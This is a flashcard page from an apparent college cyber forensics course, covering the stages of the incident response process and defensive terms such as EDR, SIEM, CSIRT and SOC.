Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Cyber Forensics Cedarville > Incident Response > Flashcards

Incident Response Flashcards

1
Q

IR Process

A

Preparation
Detection
Analysis
Containment
Eradication/Recovery
Post-incident Activity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Preparation

A

“Proactive”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What are the key ingredients of the Preparation step?

A

Plan
Properly trained staff
Forensics Hardware and Software
Regular exercises/practice

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Detection

A

Start of the reactive part of the process

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What ways can you detect?

A

Endpoint Detection and Response
Security Information and Event Management
Your own users
ISPs
Law Enforcement

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is EDR?

A

Endpoint Detection and Response

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is SIEM?

A

Security Information and Event Management

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Analysis

A

Collecting
- Memory
- Log/Registry Files
- Network Activity
- Disk images

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the goal of Analysis

A

Determine the root cause of the incident and reconstruct actions of the threat actor.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Containment

A

How do you stop the threat actor from compromising other network resources?

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is the average eCrime breakout time?

A

1h 24m

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

1-10-60 rule

A

Detecting, understanding, containing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Eradication and Recovery

A

Removing things from the system and restoring data from backups.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which is easier, reimaging a system or cleaning it?

A

Reimaging

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Post incident activity

A

Lessons learned
Written Report

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

DFIR

A

Digital Forensics/Incident Response

11
Q

What parts of the incident response process is forensics primarily concerned about?

A

Analysis and post-incident.

12
Q

CSIRT

A

Computer Security Incident Response Team

13
Q

SOC

A

Security Operations Center

14
Q

CSIRT Fusion Center

A

SOC and CSIRT combined

15
Q

What is the SOC responsible for?

A

Handling the initial incident.

16
Q

What is the first step in investigating incidents?

A

Identifying the scope
Identifying the Impact
Identifying the root cause
Identifying attribution

Cyber Forensics Cedarville (13 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions